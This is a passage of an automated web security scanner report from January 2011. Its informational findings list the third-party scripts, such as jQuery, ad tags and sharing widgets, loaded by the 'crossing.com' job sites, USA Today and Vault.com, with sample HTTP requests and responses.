<![if gte IE 7]><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=b01bb889-2690-43e8-b632-96748b9dd9e5&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cmyspace%2Cdelicious%2Cstumbleupon%2Cdigg%2Cgoogle_bmarks%2Creddit%2Cyahoo_bmarks"></script>
...[SNIP]...

15.426. http://www.tradingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tradingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pce4hd53hci195b2auvv59a984; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.427. http://www.trainingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trainingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0n2gu3r3aojtk5vp93nt6cf8v7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.428. http://www.transportationcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.transportationcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.transportationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=881r6dutr10j1cvgkdbt4hp5m4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 126822

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.429. http://www.travelingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.travelingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=n1fl3n2dn89nmcpmn2rdp35b86; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111343

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.430. http://www.truckingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truckingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:38 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9omtff16do0dj8ujh5beudm8q4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109322

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.431. http://www.tvcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tvcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4enm9d2hf1rq1gm38rib9qh690; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101357

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.432. http://www.underwritingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.underwritingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0or8bng4g6nt9r0eep9e4acqb4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103082

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.433. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/money/world/2011-01-20-chinabuilding20_ST_N.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2625
http://d.yimg.com/ds/badge.js
http://symbolcomplete.marketwatch.com/SymbolComplete/service.aspx?license=243391227070AE2A4A9752CBB727399B5969C0E2ECBFB2B3A01E585B950F63B63742DEEDF3B6DC0AECA370F53F357DF5527C71212A08BE321F61DB652CFC2854E2BD173549A6A87EC127C0A29B6AB4E82B2FE6FAEA1D1A4327EACC692DF31201EA6CB24F3DF5A97CAA2225FBEDCDE715F1CEFF77CB02259BDBB08087B10779F214B3FA86

Request

GET /money/world/2011-01-20-chinabuilding20_ST_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 22 Jan 2011 01:23:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 71520
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<script type="text/javascript" src="http://i.usatoday.net/_common/_scripts/_
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>

<script src="http://symbolcomplete.marketwatch.com/SymbolComplete/service.aspx?license=243391227070AE2A4A9752CBB727399B5969C0E2ECBFB2B3A01E585B950F63B63742DEEDF3B6DC0AECA370F53F357DF5527C71212A08BE321F61DB652CFC2854E2BD173549A6A87EC127C0A29B6AB4E82B2FE6FAEA1D1A4327EACC692DF31201EA6CB24F3DF5A97CAA2225FBEDCDE715F1CEFF77CB02259BDBB08087B10779F214B3FA86"></script>
...[SNIP]...
</script>

<script src="http://d.yimg.com/ds/badge.js"></script>
...[SNIP]...
</script>
<script src="http://d.yimg.com/ds/badge.js"></script>
...[SNIP]...

15.434. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gigya.com/JS/socialize.js?apikey=null
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/
Content-Length: 67073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</script>

<SCRIPT type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=null" >
</SCRIPT>
...[SNIP]...


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vaultaddthisuser"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

15.435. http://www.veterinarycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.veterinarycrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2mcsndiuf3f4gj6u05hhg3jfj5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
